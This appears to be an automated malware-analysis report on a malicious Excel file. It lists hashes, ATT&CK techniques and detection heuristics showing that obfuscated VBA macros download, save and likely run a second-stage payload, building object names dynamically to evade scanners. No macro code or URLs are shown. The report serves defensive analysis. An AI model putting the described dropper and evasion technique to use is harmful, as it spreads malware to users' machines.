Office (OLE) / .XLS malware analysis — malicious · 64413387408791eb

MALICIOUS

Office (OLE) / .XLS

84.5 KB Created: 2022-08-09 11:01:09 Authoring application: Microsoft Excel First seen: 2022-08-09

MD5: 5dd794b694dd7fbde7f1002dda3d6244 SHA-1: fa6151cf2e594239b615cf119f2982d14d3d9646 SHA-256: 64413387408791ebc4e35419e7db96cfb57e26d4c6bdcbf5ac5f244b18819c5c

160 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer

The critical heuristic OLE_VBA_HTTP_DROP_EXEC indicates that the VBA macros download a file from an HTTP URL and write it to disk. The high-severity heuristics OLE_VBA_CREATEOBJ and OLE_VBA_GETOBJ suggest the macros are attempting to interact with system objects, likely to execute the downloaded payload. The script itself is heavily obfuscated, but the core functionality appears to be downloading and executing a second-stage payload.

Heuristics 4

VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas` `52f68457c7a42f4b6ac3025d01c3b79465fc6131294018141cb45528bc3cf788`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3832 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.